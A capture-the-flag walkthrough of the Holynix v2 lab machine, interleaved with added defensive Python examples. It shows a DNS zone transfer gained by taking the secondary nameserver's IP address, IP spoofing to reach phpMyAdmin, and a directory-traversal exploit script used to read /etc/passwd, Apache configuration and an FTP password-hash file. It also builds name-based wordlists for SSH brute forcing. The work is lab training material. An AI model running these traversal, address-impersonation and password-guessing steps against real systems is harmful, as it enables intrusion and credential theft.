Holynix: v2 – Walkthrough

I have been so busy with my personal life, but it is time to exploit a box today. This box is the second of the Holynix series. I have a lot to do today. OK, let's try to exploit the box.

After network scanning, a VMware host is running at IP address 192.168.1.88, so my target is 192.168.1.88.

┌─[[email protected]]─[~]
└──> netdiscover

 Currently scanning: 192.168.19.0/16   |   Screen View: Unique Hosts           
                                                                               
 8 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 480               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.1.70    98:fa:e3:48:32:38      1      60  Xiaomi Communications Co Ltd
 192.168.1.75    28:e3:47:86:cd:48      1      60  Liteon Technology Corporatio
 192.168.1.88    00:0c:29:13:21:b3      2     120  VMware, Inc.                
 192.168.1.100   34:97:f6:c3:0b:66      2     120  ASUSTek COMPUTER INC.       
 192.168.1.105   40:a5:ef:dc:a7:62      1      60  Shenzhen Four Seas Global Li

Nmap again!

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.88

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 12:01 +0630
Nmap scan report for 192.168.1.88
Host is up (0.00083s latency).
Not shown: 995 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      Pure-FTPd
22/tcp open   ssh      OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
53/tcp open   domain   ISC BIND 9.4.2-P2.1
80/tcp open   http     Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:13:21:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

FTP anonymous login does not work. Time to explore port 80 and scan with dirb.

┌─[[email protected]]─[~]
└──> dirb http://192.168.1.88 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan  3 12:04:58 2018
URL_BASE: http://192.168.1.88/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.88/ ----
+ http://192.168.1.88/index (CODE:200|SIZE:1205)                                                                                                   
+ http://192.168.1.88/index.php (CODE:200|SIZE:1205)                                                                                               
+ http://192.168.1.88/phpMyAdmin (CODE:403|SIZE:330)                                                                                               
+ http://192.168.1.88/register (CODE:200|SIZE:16)                                                                                                  
+ http://192.168.1.88/server-status (CODE:403|SIZE:333)                                                                                            
                                                                                                                                                   
-----------------
END_TIME: Wed Jan  3 12:05:01 2018
DOWNLOADED: 4612 - FOUND: 5

I found one form at index.php. I tried an SQL login bypass query to test whether it is vulnerable, and also tried other methods such as file inclusion, XSS and RCE, but all failed. I also checked phpMyAdmin, but it is forbidden.

OK, now I check port 53.

http://192.168.1.88:53/

The domain was restricted. I need to dig the IP address with the domain name zincftp.com.

┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88 

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4896
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.zincftp.com.		IN	A

;; ANSWER SECTION:
www.zincftp.com.	38400	IN	A	192.168.1.88

;; AUTHORITY SECTION:
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	NS	ns1.zincftp.com.

;; ADDITIONAL SECTION:
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89

;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:16:05 +0630 2018
;; MSG SIZE  rcvd: 128

I try a zone transfer but fail!

┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88 axfr
;; global options: +cmd
; Transfer failed.

OK, now I change my IP address to the one ns2 points to.

┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.89/24 up
┌─[[email protected]]─[~]
└──> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.89  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fee3:4519  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:e3:45:19  txqueuelen 1000  (Ethernet)
        RX packets 193470  bytes 219356737 (209.1 MiB)
        RX errors 0  dropped 443  overruns 0  frame 0
        TX packets 339452  bytes 28046011 (26.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Dig again!

┌─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> zincftp.com @192.168.1.88 axfr
;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
zincftp.com.		38400	IN	A	192.168.1.88
ahuxley.zincftp.com.	38400	IN	A	192.168.1.88
amckinley.zincftp.com.	38400	IN	A	192.168.1.88
bzimmerman.zincftp.com.	38400	IN	A	192.168.1.88
cbergey.zincftp.com.	38400	IN	A	192.168.1.88
cfinnerly.zincftp.com.	38400	IN	A	192.168.1.88
cjalong.zincftp.com.	38400	IN	A	192.168.1.88
cmahong.zincftp.com.	38400	IN	A	192.168.1.88
cmanson.zincftp.com.	38400	IN	A	192.168.1.88
ddonnovan.zincftp.com.	38400	IN	A	192.168.1.88
ddypsky.zincftp.com.	38400	IN	A	192.168.1.88
dev.zincftp.com.	38400	IN	A	192.168.1.88
dhammond.zincftp.com.	38400	IN	A	192.168.1.88
dmoran.zincftp.com.	38400	IN	A	192.168.1.88
dsummers.zincftp.com.	38400	IN	A	192.168.1.88
evorhees.zincftp.com.	38400	IN	A	192.168.1.88
gwelch.zincftp.com.	38400	IN	A	192.168.1.88
hmcknight.zincftp.com.	38400	IN	A	192.168.1.88
jgacy.zincftp.com.	38400	IN	A	192.168.1.88
jsmith.zincftp.com.	38400	IN	A	192.168.1.88
jstreet.zincftp.com.	38400	IN	A	192.168.1.88
kmccallum.zincftp.com.	38400	IN	A	192.168.1.88
lnickerbacher.zincftp.com. 38400 IN	A	192.168.1.88
lsanderson.zincftp.com.	38400	IN	A	192.168.1.88
lwestre.zincftp.com.	38400	IN	A	192.168.1.88
mta.zincftp.com.	38400	IN	A	10.0.192.48
ncobol.zincftp.com.	38400	IN	A	192.168.1.88
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89
rcropper.zincftp.com.	38400	IN	A	192.168.1.88
rfrost.zincftp.com.	38400	IN	A	192.168.1.88
rwoo.zincftp.com.	38400	IN	A	192.168.1.88
skrymple.zincftp.com.	38400	IN	A	192.168.1.88
splath.zincftp.com.	38400	IN	A	192.168.1.88
tmartin.zincftp.com.	38400	IN	A	192.168.1.88
trusted.zincftp.com.	38400	IN	A	192.168.1.34
www.zincftp.com.	38400	IN	A	192.168.1.88
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:21:05 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)

It works! I try to access phpMyAdmin but it is still forbidden. The subdomains also can't be accessed. :'( OK, let's look for the stranger IPs in the same network. More digging...

┌─[✗]─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr | grep -Eiv "192.168.1.88"

;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
mta.zincftp.com.	38400	IN	A	10.0.192.48
ns2.zincftp.com.	38400	IN	A	192.168.1.89
trusted.zincftp.com.	38400	IN	A	192.168.1.34
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; WHEN: Wed Jan 03 12:25:09 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)

Notice that one subdomain points to 192.168.1.34. OK, try to change to that IP address.
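
The grep above is the manual version of a triage step worth automating: once a zone transfer succeeds, list which names resolve where, and single out the few hosts that do not sit on the main server, because those are the addresses an IP-based ACL (the zone transfer, the phpMyAdmin allow rule) is likely keyed on. The following is an added example, not code from the walkthrough; the record lines are a constructed subset in the format dig prints, and the zone name and addresses are embedded as sample data.

```python
"""Triage a dig AXFR dump: parse the records, group A records by address,
and report the hosts that do not resolve to the zone apex address."""
import re
from collections import defaultdict

# Constructed sample: a subset of the records in the format dig prints.
SAMPLE_AXFR = """\
zincftp.com.        38400   IN  SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.        38400   IN  NS  ns1.zincftp.com.
zincftp.com.        38400   IN  NS  ns2.zincftp.com.
zincftp.com.        38400   IN  MX  10 mta.zincftp.com.
zincftp.com.        38400   IN  A   192.168.1.88
ahuxley.zincftp.com.    38400   IN  A   192.168.1.88
mta.zincftp.com.    38400   IN  A   10.0.192.48
ns1.zincftp.com.    38400   IN  A   192.168.1.88
ns2.zincftp.com.    38400   IN  A   192.168.1.89
trusted.zincftp.com.    38400   IN  A   192.168.1.34
www.zincftp.com.    38400   IN  A   192.168.1.88
zincftp.com.        38400   IN  SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
"""

# owner  ttl  IN  type  rdata   (whitespace between fields may be tabs or spaces)
RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.+)$")


def parse_axfr(text):
    """Return (owner, ttl, rtype, rdata) tuples; ';' comment lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            owner, ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip("."), int(ttl), rtype, rdata.strip()))
    return records


def hosts_by_address(records):
    """Map each A-record address to the hostnames that resolve to it."""
    table = defaultdict(list)
    for owner, _ttl, rtype, rdata in records:
        if rtype == "A":
            table[rdata].append(owner)
    return dict(table)


def nameservers(records, zone):
    """Sorted NS hostnames of the zone, trailing dots removed."""
    return sorted(r[3].rstrip(".") for r in records if r[0] == zone and r[2] == "NS")


def off_host_records(records, zone):
    """A records whose address differs from the zone apex address.

    These are the hosts to review: a secondary NS or a 'trusted' host
    whose address is used in an allow-list can be impersonated by anyone
    who can take that address on the same segment."""
    apex = next((r[3] for r in records if r[0] == zone and r[2] == "A"), None)
    return [(r[0], r[3]) for r in records if r[2] == "A" and r[3] != apex]


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("nameservers:", nameservers(recs, "zincftp.com"))
    for host, addr in off_host_records(recs, "zincftp.com"):
        print(f"{host:28} -> {addr}")
```

On the walkthrough's full dump this reports exactly the three hosts the author's grep left over (ns2, mta and trusted); the defensive lesson is that `allow-transfer` and similar rules keyed on those addresses should be replaced by TSIG-signed transfers or moved behind network controls that prevent address takeover.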

┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.34/24 up

Yeah! Now I can access phpMyAdmin.

I try an SQL query with INTO OUTFILE but only get an error message.

MySQL said:

#1045 - Access denied for user 'phpadmin'@'localhost' (using password: YES)

Now I check the phpMyAdmin version in the ChangeLog file.

---------------------
phpMyAdmin - Changelog
----------------------

$Id: ChangeLog,v 2.1238.2.12 2005/09/15 16:44:29 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $

2005-09-15 Marc Delisle  <[email protected]>
    ### 2.6.4-pl1 released

The phpMyAdmin version is 2.6.4. I search for this version number on exploit-db.

┌─[[email protected]]─[~]
└──> searchsploit phpMyAdmin | grep 2.6.4
phpMyAdmin 2.6.4-pl1 - Directory Traversal                                      | exploits/php/webapps/1244.pl

OK. Time to exploit it.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 11:11:51 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2604
Connection: close
Content-Type: text/html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false
jstreet:x:1007:2002::/home/jstreet:/bin/false
rwoo:x:1008:2002::/home/rwoo:/bin/false
kmccallum:x:1009:2002::/home/kmccallum:/bin/false
cjalong:x:1010:2002::/home/cjalong:/bin/false
jsmith:x:1011:2002::/home/jsmith:/bin/false
dhammond:x:1012:2002::/home/dhammond:/bin/false
hmcknight:x:1013:2002::/home/hmcknight:/bin/false
lwestre:x:1014:2002::/home/lwestre:/bin/false
gwelch:x:1015:2002::/home/gwelch:/bin/false
dmoran:x:1016:2002::/home/dmoran:/bin/false
dsummers:x:1017:2002::/home/dsummers:/bin/false
bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false
ncobol:x:1019:2002::/home/ncobol:/bin/false
ddypsky:x:1020:2002::/home/ddypsky:/bin/false
rcropper:x:1021:2002::/home/rcropper:/bin/false
cbergey:x:1022:2002::/home/cbergey:/bin/false
tmartin:x:1023:2002::/home/tmartin:/bin/false
jgacy:x:1024:2002::/home/jgacy:/bin/false
splath:x:1025:2002::/home/splath:/bin/false
evorhees:x:1026:2002::/home/evorhees:/bin/false
rfrost:x:1027:2002::/home/rfrost:/bin/false
ahuxley:x:1028:2002::/home/ahuxley:/bin/false
webmaster:x:1029:2002::/var/www:/bin/false
cmanson:x:1030:2002::/home/cmanson:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false

It works. I check and there are 5 users who can log in via SSH.

lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash

I try to crack them using hydra with the rockyou.txt wordlist. It takes some hours but still fails. Thinking can save time, so I need to think more.

I notice the full name of each user and try to generate a wordlist to crack this. First, extract all names from /etc/passwd.

lsanderson
Lyle Sanderson
lylesanderson
cfinnerly
Chuck Finnerly
chuckfinnerly
ddonnovan
David Donnovan
daviddonnovan
skrymple
Shelly Krymple
shellykrymple
amckinley
Agustin Mckinley
agustinmckinley

Combine them again with the namemash tool.

┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./namemash.py name.txt 
lsandersonlsanderson
lsanderson.lsanderson
lsandersonl
llsanderson
l.lsanderson
lsanderson
lylesanderson
sandersonlyle
lyle.sanderson
sanderson.lyle
sandersonl
lsanderson
slyle
l.sanderson
s.lyle
lyle
[.....]
[.....]
a.agustinmckinley
agustinmckinley

And combine them again with years from 0 to 2017. I write a bash script.

#!/bin/bash
# Append every year suffix from 0 to 2020 to each candidate name.
# Reads one name per line from username.txt (the namemash output).
while read -r name; do
	for year in {0..2020}; do
		echo "${name}${year}"
	done
done < username.txt

┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./byear.sh > sshpass.txt
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> cat sshpass.txt | head -n 6
agustin0
agustin1
agustin2
agustin3
agustin4
agustin5
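
The namemash run and the byear.sh loop above build the candidate set an attacker guesses from a user's real name. The same logic, turned around, is a password-policy check a defender can run when a password is set: build the name variants for the account, strip a short trailing suffix (a year, a few digits or letters) and reject the password if what is left is one of those variants. The block below is an added example, not code from the walkthrough or from namemash; MAX_SUFFIX and the sample entries (some taken from the walkthrough, the rest constructed) are assumptions.

```python
"""Reject passwords that are a name variant plus a short suffix."""
import re

MAX_SUFFIX = 4   # assumption: "a year or a few characters" means at most 4 trailing characters


def name_variants(username, full_name):
    """Lower-case name forms an attacker would guess for this account
    (the same shapes namemash emits, from the GECOS full name)."""
    parts = full_name.lower().split()
    variants = {username.lower()}
    if len(parts) >= 2:
        first, last = parts[0], parts[-1]
        f, l = first[0], last[0]
        variants.update({
            first, last,
            first + last, last + first,
            f + last, first + l, l + first, last + f,
            first + "." + last, last + "." + first,
            f + "." + last, last + "." + f,
        })
    elif parts:                      # single-word GECOS
        variants.add(parts[0])
    return variants


def _normalise(password):
    """Case-fold and drop separators so 'Agustin_Mckinley' is compared as 'agustinmckinley'."""
    return re.sub(r"[\s_\-]", "", password.lower())


def is_name_derived(password, username, full_name):
    """True if the password equals a name variant after removing 0..MAX_SUFFIX trailing characters."""
    pw = _normalise(password)
    variants = name_variants(username, full_name)
    for cut in range(MAX_SUFFIX + 1):
        if cut >= len(pw):
            break
        stem = pw[:len(pw) - cut]
        if stem in variants:
            return True
    return False


def audit(entries):
    """entries: iterable of (username, full_name, password). Returns the usernames whose password is name-derived."""
    return [user for user, full_name, password in entries if is_name_derived(password, user, full_name)]


# Sample entries: the names and three passwords appear in the walkthrough;
# "Sanderson.Lyle" and "finnerly1999" are constructed for the demonstration.
SAMPLE_ENTRIES = [
    ("amckinley", "Agustin Mckinley", "agustinmckinley2ba9"),
    ("lsanderson", "Lyle Sanderson", "Sanderson.Lyle"),
    ("cfinnerly", "Chuck Finnerly", "finnerly1999"),
    ("tmartin", "", "millionaire"),
    ("ahuxley", "", "bravenewworld"),
]

if __name__ == "__main__":
    print("name-derived passwords:", audit(SAMPLE_ENTRIES))
```

Note that the password this box finally yields, agustinmckinley2ba9, is exactly the pattern the check catches even though the suffix is not a year, which is why the check strips any short suffix rather than only digits.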

Also no luck, but it is still cracking... Let's try another method. I need to check the web host config file again!

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../var/log/apache2/access.log

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:26:46 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 564
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>:  require(./../../../../../var/log/apache2/access.log) [<a href='function.require'>function.require</a>]: failed to open stream: Permission denied in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />
<br />
<b>Fatal error</b>:  require() [<a href='function.require'>function.require</a>]: Failed opening required './../../../../../var/log/apache2/access.log' (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />
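
The warning above shows the bug's shape: the include path is built as "./" plus a caller-controlled string, so "../" sequences (and the "..//etc" variant used later in the walkthrough) walk straight out of the web root, and only file permissions stopped this particular read. The following is an added example, not code from the walkthrough or from phpMyAdmin: a Python model of the vulnerable resolution beside a containment check that resolves the final path and refuses anything outside the base directory. WEB_ROOT is taken from the error message; the request strings are constructed samples.

```python
"""Path containment: the vulnerable resolution beside the hardened check."""
import posixpath

WEB_ROOT = "/var/www/htdocs/phpMyAdmin"   # from the error message above


def unsafe_include_path(requested, root=WEB_ROOT):
    """Mirror of the vulnerable pattern: prefix "./", join, and trust the result."""
    return posixpath.normpath(posixpath.join(root, "./" + requested))


def safe_include_path(requested, root=WEB_ROOT):
    """Return the resolved path only if it stays inside root, otherwise None."""
    if "\x00" in requested:             # an embedded NUL would truncate an appended extension in C-based runtimes
        return None
    root_norm = posixpath.normpath(root)
    # normpath collapses ".", "..", and repeated slashes; join() discards root for absolute input,
    # which the containment test below then rejects.
    candidate = posixpath.normpath(posixpath.join(root_norm, requested))
    # The trailing "/" matters: without it ".../phpMyAdmin2/x" would count as inside ".../phpMyAdmin".
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


def classify(requested, root=WEB_ROOT):
    """Show both outcomes for one request: what the old code would include, and the verdict."""
    return {
        "resolved": unsafe_include_path(requested, root),
        "allowed": safe_include_path(requested, root) is not None,
    }


if __name__ == "__main__":
    for req in ("../../../../../etc/passwd",
                "../../../../..//etc/pure-ftpd/pureftpd.passwd",
                "libraries/grab_globals.lib.php"):
        print(f"{req:50} -> {classify(req)}")
```

A containment check is the minimum; the stronger fix for an include is an allow-list of the handful of files the application actually needs, so that user input selects a key rather than a path.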

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/apache2.conf

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:27:26 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Connection: close
Content-Type: text/html

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars

Now try to read the site config file.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default

Yes, I found another directory, setup_guides. Check it.

http://www.zincftp.com/setup_guides/todo

Found another interesting file. So try to read it again!

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../..//etc/pure-ftpd/pureftpd.passwd

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:35:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2602
Connection: close
Content-Type: text/html

cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./::::::::::::
lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./::::::::::::
jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./::::::::::::
rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./::::::::::::
cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./::::::::::::
kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./::::::::::::
cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./::::::::::::
jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./::::::::::::
lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./::::::::::::
dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./::::::::::::
hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./::::::::::::
lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./::::::::::::
gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./::::::::::::
dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./::::::::::::
dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./::::::::::::
bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./::::::::::::
amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./::::::::::::
ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./::::::::::::
ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./::::::::::::
rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./::::::::::::
ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./::::::::::::
cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./::::::::::::
tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./::::::::::::
jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./::::::::::::
splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./::::::::::::
skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./::::::::::::
evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./::::::::::::
